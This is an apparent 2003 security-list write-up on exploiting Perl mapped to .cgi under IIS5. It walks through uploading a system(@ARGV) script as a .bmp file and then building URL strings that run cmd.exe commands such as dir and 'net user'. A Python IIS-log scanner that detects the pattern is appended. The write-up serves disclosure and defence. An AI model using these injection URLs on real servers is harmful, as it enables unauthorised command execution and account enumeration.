The Building Of An Exploit String

From: Brett Moore (brett@softwarecreations.co.nz)
Date: Wed Feb 26 2003 - 21:01:04 EST


*********************************************
The Building Of An Exploit String
- Exploiting The PERL Under IIS
*********************************************
PERL v5.6.1 built for MSWin32-x86
*http://www.perl.com/
*http://www.activestate.com

The problems highlighted in this write-up are not directly related to the use
of perl but highlight some of the possibilities when problems with file
uploading and directory permissions are abused. It is highly possible that
these techniques could be used against other command line interpreters.

I recently audited a package that used the perl.exe interpreter on a Windows
2000 server running IIS5.

Under Application Configuration in the IIS management console, the .cgi
extension is mapped as: c:/APP/perl/bin/perl.exe %s

This gives us access to the perl executable through any request for a file
with a .cgi extension.

example: *http://192.168.1.1/web/test.cgi
returns: Can't open perl script "C:\APP\web\test.cgi": No such file or directory

This is obviously a path disclosure issue.

All attempts to pass parameters to perl.exe fail.

example: *http://192.168.1.1/web/-h.cgi
result: Can't open perl script "C:\APP\web\-h.cgi": No such file or directory

It seems that IIS is passing the full path to the interpreter (the %s in the
script mapping), so the file name in the URL is never treated as a perl switch.

So what we required was the ability to create a file on the server and then
pass that file to the perl interpreter.

This particular application allowed uploading of files with a .bmp extension,
so we created a small perl script
        system(@ARGV);

and uploaded it as system.bmp. This file was uploaded to the folder
        c:/APP/web/data/

IIS will only pass the file to the perl interpreter if it has a cgi extension,
which our uploaded file doesn't have.

example: *http://192.168.1.1/web/data/system.bmp.cgi
result: Can't open perl script "C:\APP\web\data\system.bmp.cgi": No such file or directory

By placing a %20 (space) or %09 (tab) between the .bmp and the .cgi we are
able to force the interpreter to execute our script.

example: *http://192.168.1.1/web/data/system.bmp%20.cgi
result: '.cgi' is not recognized as an internal or external command,
         operable program or batch file.

The system command inside our uploaded file is executing and using the
.cgi as the argv parameter.

Any arguments placed before the %20.cgi will be used by our system call.

example: *http://192.168.1.1/web/data/system.bmp%20dir%20.cgi
result: the browser prompts to open the response or save it to disk

Appending a ? to the end of the url will prevent the open/save to disk request.

example: *http://192.168.1.1/web/data/system.bmp%20dir%20.cgi?
result: Directory of C:\APP\web
         File Not Found

This results in a File Not Found message because our script is running
        system("dir .cgi?")

This is easily avoided by inserting an & (ampersand) character after the
last argument and before the %20.cgi

example: *http://192.168.1.1/web/data/system.bmp%20dir%20&%20.cgi?
result:
        Directory of C:\APP\web

        02/12/2003 09:21a <DIR> .
        02/12/2003 09:21a <DIR> ..
        02/12/2003 01:35a 15 a.pl
        02/12/2003 12:36a <DIR> bin
        02/12/2003 12:36a 206 default.htm
        etc..
              10 File(s) 17,165 bytes
               6 Dir(s) 52,390,678,528 bytes free
        '.cgi' is not recognized as an internal or external command,
        operable program or batch file.

Which will now run as system("dir & .cgi?"), which cmd.exe interprets as two
separate DOS commands.

This will not work when attempting to run executable files.

example: *http://192.168.1.1/web/data/system.bmp%20net%20user%20&%20%20.cgi?
result: More help is available by typing NET HELPMSG 2221.

example: *http://192.168.1.1/web/data/system.bmp%20net%20use%20&%20%20.cgi?
result: The network name cannot be found.

This is caused by cmd.exe interpreting the 'user & .cgi' part of the
string as the parameter to pass to 'net.exe'. This results in a call to
 "net user & .cgi" which is invalid.

By placing " (double quotes) around our net.exe call we can modify the way
that cmd.exe will interpret the string.

example:
*http://192.168.1.1/web/data/system.bmp%20"net%20user"%20&%20%20.cgi?
result: ------------------------------------------------------------
        Administrator Guest IUSR_BLACKHOLE
        IWAM_BLACKHOLE NetShowServices TsInternetUser
        VUSR_BLACKHOLE
        The command completed with one or more errors.

        '.cgi' is not recognized as an internal or external command,
        operable program or batch file.

The '.cgi' error is still being shown here because it is still being
interpreted. By adding a final command and redirecting its output to a writable
file space we can have this error removed.

example:
*http://192.168.1.1/web/data/system.bmp%20"net%20user"%20&%20dir%20>%20\a.cgi?
result: ------------------------------------------------------------
        Administrator Guest IUSR_BLACKHOLE
        IWAM_BLACKHOLE NetShowServices TsInternetUser
        VUSR_BLACKHOLE
        The command completed with one or more errors.

..
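For anyone reviewing IIS logs for the pattern built up above, the following
detection logic is an added example and is not part of Brett Moore's post. It
reads a subset of W3C extended log fields, URL-decodes the requested path so
that %20 and %09 become real whitespace, and flags a request for a
script-mapped extension when the script name contains whitespace or cmd.exe
metacharacters, or when it falls under an upload folder. The .cgi mapping and
the /web/data/ upload folder come from the write-up; the field layout, the
client address 192.168.1.50 and the log lines are constructed for the example.
The trailing ? of the write-up's URLs would land in cs-uri-query and is not
needed by the check.

```python
"""Flag IIS requests that put whitespace between an uploaded file's name and a
script-mapped extension (the system.bmp%20.cgi pattern), for log review."""
import re
from urllib.parse import unquote

# Extensions mapped to an interpreter in the IIS application configuration.
# Only .cgi appears in the write-up; others would be added from the real mapping.
MAPPED_EXTENSIONS = (".cgi",)
# Web paths of folders that accept uploads (assumed from the write-up's c:/APP/web/data/).
UPLOAD_PREFIXES = ("/web/data/",)
# cmd.exe characters the write-up shows being used to reshape the interpreter's argument.
SHELL_META = set('&|<>"')

# Subset of W3C extended log fields assumed for this example.
W3C_FIELDS = ("date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status")

# Constructed sample log: 192.168.1.50 is a made-up client, the URIs are the write-up's.
SAMPLE_LOG = r"""#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-02-12 09:21:03 192.168.1.50 GET /web/default.htm - 200
2003-02-12 09:21:10 192.168.1.50 GET /web/test.cgi - 500
2003-02-12 09:21:41 192.168.1.50 GET /web/data/system.bmp%20.cgi - 200
2003-02-12 09:22:05 192.168.1.50 GET /web/data/system.bmp%20dir%20&%20.cgi - 200
2003-02-12 09:22:30 192.168.1.50 GET /web/data/system.bmp%20"net%20user"%20&%20dir%20>%20\a.cgi - 200
"""


def parse_w3c_line(line):
    """Split one W3C log line into a field dict; directives and blank lines give None."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < len(W3C_FIELDS):
        return None
    return dict(zip(W3C_FIELDS, parts))


def analyse_stem(stem):
    """Return the list of reasons a requested path matches the pattern (empty if clean)."""
    decoded = unquote(stem)  # %20 -> space, %09 -> tab; harmless if already decoded
    lower = decoded.lower()
    reasons = []
    ext = next((e for e in MAPPED_EXTENSIONS if lower.endswith(e)), None)
    if ext is None:
        return reasons  # not handed to an interpreter, nothing to check
    # Everything after the last '/' and before the mapped extension is what the
    # interpreter receives as its script name; it should be a plain file name.
    script_name = decoded.rsplit("/", 1)[-1][: -len(ext)]
    if re.search(r"\s", script_name):
        reasons.append("whitespace-in-script-name")
    if SHELL_META & set(script_name):
        reasons.append("shell-metacharacter-in-script-name")
    if lower.startswith(UPLOAD_PREFIXES):
        reasons.append("script-mapped-request-under-upload-dir")
    return reasons


def scan_log(text):
    """Return (client, stem, reasons) for every request in the log that matched."""
    findings = []
    for line in text.splitlines():
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        reasons = analyse_stem(rec["cs-uri-stem"])
        if reasons:
            findings.append((rec["c-ip"], rec["cs-uri-stem"], reasons))
    return findings


if __name__ == "__main__":
    for client, stem, reasons in scan_log(SAMPLE_LOG):
        print(client, stem, ", ".join(reasons))
```

On the sample log the plain /web/test.cgi request is left alone while the three
requests under /web/data/ are reported, the first for whitespace alone and the
other two for whitespace plus shell metacharacters. Whitespace in a script name
handed to an interpreter is the one marker common to every stage of the string
above, so it is the check to keep even when the upload folder is unknown.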
